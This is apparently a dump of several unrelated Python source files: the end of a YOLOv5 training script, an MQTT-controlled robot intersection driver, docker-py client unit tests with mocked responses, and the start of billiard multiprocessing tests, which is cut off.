final = best if best.exists() else last # final model
for f in last, best:
if f.exists():
strip_optimizer(f) # strip optimizers
if opt.bucket:
os.system(f'gsutil cp {final} gs://{opt.bucket}/weights') # upload
if wandb_logger.wandb and not opt.evolve: # Log the stripped model
wandb_logger.wandb.log_artifact(str(final), type='model',
name='run_' + wandb_logger.wandb_run.id + '_model',
aliases=['last', 'best', 'stripped'])
wandb_logger.finish_run()
else:
dist.destroy_process_group()
torch.cuda.empty_cache()
return results
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--weights', type=str, default='yolov5s.pt', help='initial weights path')
parser.add_argument('--cfg', type=str, default='', help='model.yaml path')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='data.yaml path')
parser.add_argument('--hyp', type=str, default='data/hyp.scratch.yaml', help='hyperparameters path')
parser.add_argument('--epochs', type=int, default=300)
parser.add_argument('--batch-size', type=int, default=16, help='total batch size for all GPUs')
parser.add_argument('--img-size', nargs='+', type=int, default=[640, 640], help='[train, test] image sizes')
parser.add_argument('--rect', action='store_true', help='rectangular training')
parser.add_argument('--resume', nargs='?', const=True, default=False, help='resume most recent training')
parser.add_argument('--nosave', action='store_true', help='only save final checkpoint')
parser.add_argument('--notest', action='store_true', help='only test final epoch')
parser.add_argument('--noautoanchor', action='store_true', help='disable autoanchor check')
parser.add_argument('--evolve', action='store_true', help='evolve hyperparameters')
parser.add_argument('--bucket', type=str, default='', help='gsutil bucket')
parser.add_argument('--cache-images', action='store_true', help='cache images for faster training')
parser.add_argument('--image-weights', action='store_true', help='use weighted image selection for training')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--multi-scale', action='store_true', help='vary img-size +/- 50%%')
parser.add_argument('--single-cls', action='store_true', help='train multi-class data as single-class')
parser.add_argument('--adam', action='store_true', help='use torch.optim.Adam() optimizer')
parser.add_argument('--sync-bn', action='store_true', help='use SyncBatchNorm, only available in DDP mode')
parser.add_argument('--local_rank', type=int, default=-1, help='DDP parameter, do not modify')
parser.add_argument('--workers', type=int, default=8, help='maximum number of dataloader workers')
parser.add_argument('--project', default='runs/train', help='save to project/name')
parser.add_argument('--entity', default=None, help='W&B entity')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--quad', action='store_true', help='quad dataloader')
parser.add_argument('--linear-lr', action='store_true', help='linear LR')
parser.add_argument('--label-smoothing', type=float, default=0.0, help='Label smoothing epsilon')
parser.add_argument('--upload_dataset', action='store_true', help='Upload dataset as W&B artifact table')
parser.add_argument('--bbox_interval', type=int, default=-1, help='Set bounding-box image logging interval for W&B')
parser.add_argument('--save_period', type=int, default=-1, help='Log model after every "save_period" epoch')
parser.add_argument('--artifact_alias', type=str, default="latest", help='version of dataset artifact to be used')
opt = parser.parse_args()
# Set DDP variables
opt.world_size = int(os.environ['WORLD_SIZE']) if 'WORLD_SIZE' in os.environ else 1
opt.global_rank = int(os.environ['RANK']) if 'RANK' in os.environ else -1
set_logging(opt.global_rank)
if opt.global_rank in [-1, 0]:
check_git_status()
check_requirements()
# Resume
wandb_run = check_wandb_resume(opt)
if opt.resume and not wandb_run: # resume an interrupted run
ckpt = opt.resume if isinstance(opt.resume, str) else get_latest_run() # specified or most recent path
assert os.path.isfile(ckpt), 'ERROR: --resume checkpoint does not exist'
apriori = opt.global_rank, opt.local_rank
with open(Path(ckpt).parent.parent / 'opt.yaml') as f:
opt = argparse.Namespace(**yaml.load(f, Loader=yaml.SafeLoader)) # replace
opt.cfg, opt.weights, opt.resume, opt.batch_size, opt.global_rank, opt.local_rank = '', ckpt, True, opt.total_batch_size, *apriori # reinstate
logger.info('Resuming training from %s' % ckpt)
else:
# opt.hyp = opt.hyp or ('hyp.finetune.yaml' if opt.weights else 'hyp.scratch.yaml')
opt.data, opt.cfg, opt.hyp = check_file(opt.data), check_file(opt.cfg), check_file(opt.hyp) # check files
assert len(opt.cfg) or len(opt.weights), 'either --cfg or --weights must be specified'
opt.img_size.extend([opt.img_size[-1]] * (2 - len(opt.img_size))) # extend to 2 sizes (train, test)
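# e.g. '--img-size 640' becomes [640, 640]: train and test use the same
# resolution unless two values are given explicitly.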
opt.name = 'evolve' if opt.evolve else opt.name
opt.save_dir = increment_path(Path(opt.project) / opt.name, exist_ok=opt.exist_ok | opt.evolve) # increment run
# DDP mode
opt.total_batch_size = opt.batch_size
device = select_device(opt.device, batch_size=opt.batch_size)
if opt.local_rank != -1:
assert torch.cuda.device_count() > opt.local_rank
torch.cuda.set_device(opt.local_rank)
device = torch.device('cuda', opt.local_rank)
dist.init_process_group(backend='nccl', init_method='env://') # distributed backend
assert opt.batch_size % opt.world_size == 0, '--batch-size must be multiple of CUDA device count'
opt.batch_size = opt.total_batch_size // opt.world_size
# Hyperparameters
with open(opt.hyp) as f:
hyp = yaml.load(f, Loader=yaml.SafeLoader) # load hyps
# Train
logger.info(opt)
if not opt.evolve:
tb_writer = None # init loggers
if opt.global_rank in [-1, 0]:
prefix = colorstr('tensorboard: ')
logger.info(f"{prefix}Start with 'tensorboard --logdir {opt.project}', view at http://localhost:6006/")
tb_writer = SummaryWriter(opt.save_dir) # Tensorboard
train(hyp, opt, device, tb_writer)
# Evolve hyperparameters (optional)
else:
# Hyperparameter evolution metadata (mutation scale 0-1, lower_limit, upper_limit)
meta = {'lr0': (1, 1e-5, 1e-1), # initial learning rate (SGD=1E-2, Adam=1E-3)
'lrf': (1, 0.01, 1.0), # final OneCycleLR learning rate (lr0 * lrf)
'momentum': (0.3, 0.6, 0.98), # SGD momentum/Adam beta1
'weight_decay': (1, 0.0, 0.001), # optimizer weight decay
'warmup_epochs': (1, 0.0, 5.0), # warmup epochs (fractions ok)
'warmup_momentum': (1, 0.0, 0.95), # warmup initial momentum
'warmup_bias_lr': (1, 0.0, 0.2), # warmup initial bias lr
'box': (1, 0.02, 0.2), # box loss gain
'cls': (1, 0.2, 4.0), # cls loss gain
'cls_pw': (1, 0.5, 2.0), # cls BCELoss positive_weight
'obj': (1, 0.2, 4.0), # obj loss gain (scale with pixels)
'obj_pw': (1, 0.5, 2.0), # obj BCELoss positive_weight
'iou_t': (0, 0.1, 0.7), # IoU training threshold
'anchor_t': (1, 2.0, 8.0), # anchor-multiple threshold
'anchors': (2, 2.0, 10.0), # anchors per output grid (0 to ignore)
'fl_gamma': (0, 0.0, 2.0), # focal loss gamma (efficientDet default gamma=1.5)
'hsv_h': (1, 0.0, 0.1), # image HSV-Hue augmentation (fraction)
'hsv_s': (1, 0.0, 0.9), # image HSV-Saturation augmentation (fraction)
'hsv_v': (1, 0.0, 0.9), # image HSV-Value augmentation (fraction)
'degrees': (1, 0.0, 45.0), # image rotation (+/- deg)
'translate': (1, 0.0, 0.9), # image translation (+/- fraction)
'scale': (1, 0.0, 0.9), # image scale (+/- gain)
'shear': (1, 0.0, 10.0), # image shear (+/- deg)
'perspective': (0, 0.0, 0.001), # image perspective (+/- fraction), range 0-0.001
'flipud': (1, 0.0, 1.0), # image flip up-down (probability)
'fliplr': (0, 0.0, 1.0), # image flip left-right (probability)
'mosaic': (1, 0.0, 1.0), # image mosaic (probability)
'mixup': (1, 0.0, 1.0)} # image mixup (probability)
assert opt.local_rank == -1, 'DDP mode not implemented for --evolve'
opt.notest, opt.nosave = True, True # only test/save final epoch
# ei = [isinstance(x, (int, float)) for x in hyp.values()] # evolvable indices
yaml_file = Path(opt.save_dir) / 'hyp_evolved.yaml' # save best result here
if opt.bucket:
os.system('gsutil cp gs://%s/evolve.txt .' % opt.bucket) # download evolve.txt if exists
for _ in range(300): # generations to evolve
if Path('evolve.txt').exists(): # if evolve.txt exists: select best hyps and mutate
# Select parent(s)
parent = 'single' # parent selection method: 'single' or 'weighted'
x = np.loadtxt('evolve.txt', ndmin=2)
n = min(5, len(x)) # number of previous results to consider
x = x[np.argsort(-fitness(x))][:n] # top n mutations
w = fitness(x) - fitness(x).min() # weights
if parent == 'single' or len(x) == 1:
# x = x[random.randint(0, n - 1)] # random selection
x = x[random.choices(range(n), weights=w)[0]] # weighted selection
elif parent == 'weighted':
x = (x * w.reshape(n, 1)).sum(0) / w.sum() # weighted combination
# Mutate
mp, s = 0.8, 0.2 # mutation probability, sigma
npr = np.random
npr.seed(int(time.time()))
g = np.array([x[0] for x in meta.values()]) # gains 0-1
ng = len(meta)
v = np.ones(ng)
while all(v == 1): # mutate until a change occurs (prevent duplicates)
v = (g * (npr.random(ng) < mp) * npr.randn(ng) * npr.random() * s + 1).clip(0.3, 3.0)
for i, k in enumerate(hyp.keys()): # plt.hist(v.ravel(), 300)
hyp[k] = float(x[i + 7] * v[i]) # mutate
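# x[i + 7]: the first 7 columns of each evolve.txt row hold the result metrics
# (P, R, mAP@.5, mAP@.5:.95 and the three val losses), so hyperparameter i is
# read from column i + 7 and scaled by the mutation factor v[i], which was
# clipped to [0.3, 3.0] above.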
# Constrain to limits
for k, v in meta.items():
hyp[k] = max(hyp[k], v[1]) # lower limit
hyp[k] = min(hyp[k], v[2]) # upper limit
hyp[k] = round(hyp[k], 5) # significant digits
# Train mutation
results = train(hyp.copy(), opt, device)
# Write mutation results
print_mutation(hyp.copy(), results, yaml_file, opt.bucket)
# Plot results
plot_evolution(yaml_file)
print(f'Hyperparameter evolution complete. Best results saved as: {yaml_file}\n'
f'Command to train a new model with these hyperparameters: $ python train.py --hyp {yaml_file}')
|
bot.py
|
#!/usr/bin/python
import sys
import paho.mqtt.client as paho
import json
import threading
import Queue
import motion
import sensor
import os
from time import sleep
from time import time
from time import strftime
os.system("sntp -s 129.6.15.30 &>/dev/null")
# queue of commands for inter-thread communication
command_q = Queue.Queue() # STOP_AT_RED, GO_AT_RED
# Create topic from bot_id
def get_topic(bot_id):
return "wolfbot/" + bot_id + "/command"
# initialize a client and connect to the server
def prepare_mqttc(mqtt_host, bot_id, mqtt_port):
# create a mqtt client
mqttc = paho.Client(client_id="bot_" + bot_id)
mqttc.on_message = on_command
mqttc.connect(host=mqtt_host, port=mqtt_port, keepalive=60)
# subscribe to TOPIC
topic = get_topic(bot_id)
print topic
mqttc.subscribe(topic)
return mqttc
# create request json
def create_pass_request(bot_id, bot_type, enter_lane, exit_lane):
msg = {}
msg["bot_id"] = bot_id
msg["bot_type"] = bot_type
msg["enter"] = enter_lane
msg["exit"] = exit_lane
msg["respond_to"] = get_topic(bot_id)
return json.dumps(msg)
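# e.g. create_pass_request("bot_1", "civilian", 1, 3) yields (key order may
# vary): '{"bot_id": "bot_1", "bot_type": "civilian", "enter": 1, "exit": 3,
# "respond_to": "wolfbot/bot_1/command"}'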
# create complete json
def create_complete_msg(bot_id, bot_type):
msg = {}
msg["bot_id"] = bot_id
msg["bot_type"] = bot_type
msg["status"] = "complete"
return json.dumps(msg)
# The callback for when a PUBLISH message is received from the server.
def on_command(mqttc, userdata, msg):
print msg.payload
# parse the payload
pass_comm = json.loads(msg.payload)
# send a command to the driver thread
if pass_comm["command"] == "go":
command_q.put("GO_AT_RED")
print "GO_AT_RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
else:
command_q.put("STOP_AT_RED")
print "STOP_AT_RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# the driver function which controls the bot.
def driver(mqttc, bot_id, bot_type, entry_lane, exit_lane, command_q):
# check entry and exit lanes
if entry_lane < 1 or entry_lane > 4 or exit_lane < 1 or exit_lane > 4 or entry_lane == exit_lane:
print "Invalid entry or exit lane"
return
# motion object to achieve line following
bot_motion = motion.Motion()
if not bot_motion.valid:
print "Error in creating Motion object"
mqttc.disconnect()
return
# give time to manually align the bot
print "Manually align the bot"
sleep(2)
# sensor object to read markings on road
bot_sensor = sensor.Sensor()
#journey_state : AT_SRC, NEED_BLACK, REQUEST, NEED_RED, WAITING, CROSSING, DEPARTING, AT_DEST
journey_state = "AT_SRC"
# by default, stop at red
command = "STOP_AT_RED"
# loop to control the motion and sensors based on TIM command
while (True):
# check for any commands from master thread
if not command_q.empty():
command = command_q.get()
# state machine using if-else control
if journey_state == "AT_SRC":
# at the start of the entry lane
bot_motion.start()
journey_state = "NEED_BLACK"
elif journey_state == "NEED_BLACK":
# moving on the entry lane; keep waiting until the first black line is
# seen, then move to the REQUEST state to ask TIM for permission to pass
if not bot_sensor.is_Black():
continue
journey_state = "REQUEST"
elif journey_state == "REQUEST":
# request TIM to pass the intersection
pass_req = create_pass_request(bot_id, bot_type, entry_lane, exit_lane)
mqttc.publish("tim/jid_1/request", pass_req)
print "REQUESTED " + str(strftime("%Y-%m-%d %H:%M:%S"))
journey_state = "NEED_RED"
elif journey_state == "NEED_RED":
# keep waiting till you come across red line
if not bot_sensor.is_Red():
continue
print "RED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# stop the bot and go to wait state
bot_motion.stop()
journey_state = "WAITING"
elif journey_state == "WAITING":
# waiting at red line for a go command from TIM
if command == "STOP_AT_RED":
continue
journey_state = "CROSSING"
elif journey_state == "CROSSING":
# left / right / straight logic
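# Lanes are assumed to be numbered 1-4 around the intersection: an even
# difference (1<->3, 2<->4) means the exit is straight ahead, otherwise the
# bot turns, with the 1<->4 pair (sum 5, difference 3) handled separately
# because the lane numbering wraps around.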
diff = abs(entry_lane - exit_lane)
if diff % 2 == 0:
bot_motion.cross_straight()
else:
if entry_lane + exit_lane == 5 and abs(entry_lane - exit_lane) == 3:
if entry_lane < exit_lane:
bot_motion.cross_right()
else:
bot_motion.cross_left()
else:
if entry_lane > exit_lane:
bot_motion.cross_right()
else:
bot_motion.cross_left()
journey_state = "DEPARTING"
elif journey_state == "DEPARTING":
# give time to manually align the bot
print "Manually align the bot"
sleep(1.5)
# start line following on the exit lane
bot_motion.start()
# wait for 3 seconds before notifying that the junction is empty
sleep(3)
complete_msg = create_complete_msg(bot_id, bot_type)
mqttc.publish("tim/jid_1/complete", complete_msg)
print "COMPLETED " + str(strftime("%Y-%m-%d %H:%M:%S"))
# travel for a few more seconds on the exit lane before stopping
sleep(6) # sleep because there is nothing else to do
journey_state = "AT_DEST"
elif journey_state == "AT_DEST":
# on reaching the end of the exit lane
bot_motion.stop()
# disconnect after reaching the destination
mqttc.disconnect()
break
# main function
def main():
# check usage
if len(sys.argv) != 6 and len(sys.argv) != 7:
print "Usage : python tim.py BOT_ID BOT_TYPE ENTRY_LANE EXIT_LANE MOSQUITTO_HOST <MOSQUITTO_PORT>"
exit(1)
# process command line arguments
bot_id = sys.argv[1]
bot_type = sys.argv[2]
entry_lane = int(sys.argv[3])
exit_lane = int(sys.argv[4])
mqtt_host = sys.argv[5]
if len(sys.argv) == 7:
mqtt_port = int(sys.argv[6])
else:
mqtt_port = 1883
if bot_type != "civilian" and bot_type != "ems":
print "Invalid bot type : civilian / ems"
exit(1)
if exit_lane > 4 or exit_lane < 1:
print "Invalid exit lane : 1 to 4"
exit(1)
if entry_lane > 4 or entry_lane < 1:
print "Invalid exit lane : 1 to 4"
exit(1)
# get mqtt client
mqttc = prepare_mqttc(mqtt_host, bot_id, mqtt_port)
# create a thread for the driver function
driver_thread = threading.Thread(target = driver, args = (mqttc, bot_id, bot_type, entry_lane, exit_lane, command_q))
driver_thread.start()
# Blocking call that processes network traffic, dispatches callbacks and
# handles reconnecting.
# Other loop*() functions are available that give a threaded interface and a
# manual interface.
mqttc.loop_forever()
print "Terminating"
if __name__ == "__main__":
main()
|
api_test.py
|
import datetime
import json
import io
import os
import re
import shutil
import socket
import tempfile
import threading
import time
import unittest
import docker
from docker.api import APIClient
import requests
from requests.packages import urllib3
import six
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None, *args, **kwargs):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
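# fake_api.fake_responses is keyed either by url alone or by (url, method);
# each value is a callable returning (status_code, content).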
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream, tty=False):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class BaseAPIClientTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.api.client.APIClient',
get=fake_get,
post=fake_post,
put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = APIClient()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(BaseAPIClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
APIClient(version=1.12)
assert str(
excinfo.value
) == 'Version parameter must be a string or None. Found float'
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
assert url == '{0}{1}'.format(url_prefix, 'hello/somename/world')
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
assert url == '{0}{1}'.format(
url_prefix, 'hello/somename/world/someothername'
)
url = self.client._url('/hello/{0}/world', 'some?name')
assert url == '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
url = self.client._url("/images/{0}/push", "localhost:5000/image")
assert url == '{0}{1}'.format(
url_prefix, 'images/localhost:5000/image/push'
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
assert url == '{0}{1}'.format(url_prefix, 'simple')
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
assert url == '{0}{1}'.format(url_base, 'hello/somename/world')
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = APIClient(version="auto")
assert isinstance(client._version, six.string_types)
assert not (client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
assert isinstance(version, six.string_types)
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_login(self):
self.client.login('sakuya', 'izayoi')
args = fake_request.call_args
assert args[0][0] == 'POST'
assert args[0][1] == url_prefix + 'auth'
assert json.loads(args[1]['data']) == {
'username': 'sakuya', 'password': 'izayoi'
}
assert args[1]['headers'] == {'Content-Type': 'application/json'}
assert self.client._auth_configs['auths'] == {
'docker.io': {
'email': None,
'password': 'izayoi',
'username': 'sakuya',
'serveraddress': None,
}
}
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True,
timeout=None
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True,
timeout=None
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True,
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = APIClient(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = APIClient(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = APIClient(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = APIClient(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = APIClient(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
assert 'SecurityOpt' in result
assert result['SecurityOpt'] == security_opt
with pytest.raises(TypeError):
self.client.create_host_config(security_opt='wrong')
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str.decode('utf-8')
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
class UnixSocketStreamTest(unittest.TestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
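# The handler above replies before reading the request body; the response is a
# minimal chunked HTTP message in which each chunk is its hex length on one
# line followed by the data, and the final zero-length ('0') chunk ends the
# stream.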
with APIClient(base_url="http+unix://" + self.socket_file) as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
assert list(stream) == [
str(i).encode() for i in range(50)
]
class TCPSocketStreamTest(unittest.TestCase):
text_data = b'''
Now, those children out there, they're jumping through the
flames in the hope that the god of the fire will make them fruitful.
Really, you can't blame them. After all, what girl would not prefer the
child of a god to that of some acne-scarred artisan?
'''
def setUp(self):
self.server = six.moves.socketserver.ThreadingTCPServer(
('', 0), self.get_handler_class()
)
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.setDaemon(True)
self.thread.start()
self.address = 'http://{}:{}'.format(
socket.gethostname(), self.server.server_address[1]
)
def tearDown(self):
self.server.shutdown()
self.server.server_close()
self.thread.join()
def get_handler_class(self):
text_data = self.text_data
class Handler(six.moves.BaseHTTPServer.BaseHTTPRequestHandler, object):
def do_POST(self):
self.send_response(101)
self.send_header(
'Content-Type', 'application/vnd.docker.raw-stream'
)
self.send_header('Connection', 'Upgrade')
self.send_header('Upgrade', 'tcp')
self.end_headers()
self.wfile.flush()
time.sleep(0.2)
self.wfile.write(text_data)
self.wfile.flush()
return Handler
def test_read_from_socket(self):
with APIClient(base_url=self.address) as client:
resp = client._post(client._url('/dummy'), stream=True)
data = client._read_from_socket(resp, stream=True, tty=True)
results = b''.join(data)
assert results == self.text_data
class UserAgentTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(
APIClient,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = APIClient()
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-sdk-python/%s' % docker.__version__
assert headers['User-Agent'] == expected
def test_custom_user_agent(self):
client = APIClient(user_agent='foo/bar')
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
assert headers['User-Agent'] == 'foo/bar'
class DisableSocketTest(unittest.TestCase):
class DummySocket(object):
def __init__(self, timeout=60):
self.timeout = timeout
def settimeout(self, timeout):
self.timeout = timeout
def gettimeout(self):
return self.timeout
def setUp(self):
self.client = APIClient()
def test_disable_socket_timeout(self):
"""Test that the timeout is disabled on a generic socket object."""
socket = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
def test_disable_socket_timeout2(self):
"""Test that the timeouts are disabled on a generic socket object
and its _sock object if present."""
socket = self.DummySocket()
socket._sock = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout is None
def test_disable_socket_timeout_non_blocking(self):
"""Test that a non-blocking socket does not get set to blocking."""
socket = self.DummySocket()
socket._sock = self.DummySocket(0.0)
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout == 0.0
|
test_multiprocessing.py
|
#!/usr/bin/env python
from __future__ import absolute_import
#
# Unit tests for the multiprocessing package
#
import unittest
import Queue
import time
import sys
import os
import gc
import array
import random
import logging
from nose import SkipTest
from test import test_support
from StringIO import StringIO
try:
from billiard._ext import _billiard
except ImportError as exc:
raise SkipTest(exc)
# import threading after _billiard to raise a more relevant error
# message: "No module named _billiard". _billiard is not compiled
# without thread support.
import threading
# Work around broken sem_open implementations
try:
import billiard.synchronize
except ImportError as exc:
raise SkipTest(exc)
import billiard.dummy
import billiard.connection
import billiard.managers
import billiard.heap
import billiard.pool
from billiard import util
from billiard.compat import bytes
latin = str
# Constants
LOG_LEVEL = util.SUBWARNING
DELTA = 0.1
# Setting this to True makes the tests take a lot longer and can sometimes
# cause non-serious failures, because some calls block a bit longer than
# expected
CHECK_TIMINGS = False
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_billiard,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
# Some tests require ctypes
try:
from ctypes import Structure, c_int, c_double
except ImportError:
Structure = object
c_int = c_double = None
try:
from ctypes import Value
except ImportError:
Value = None
try:
from ctypes import copy as ctypes_copy
except ImportError:
ctypes_copy = None
class TimingWrapper(object):
"""Creates a wrapper for a function which records the
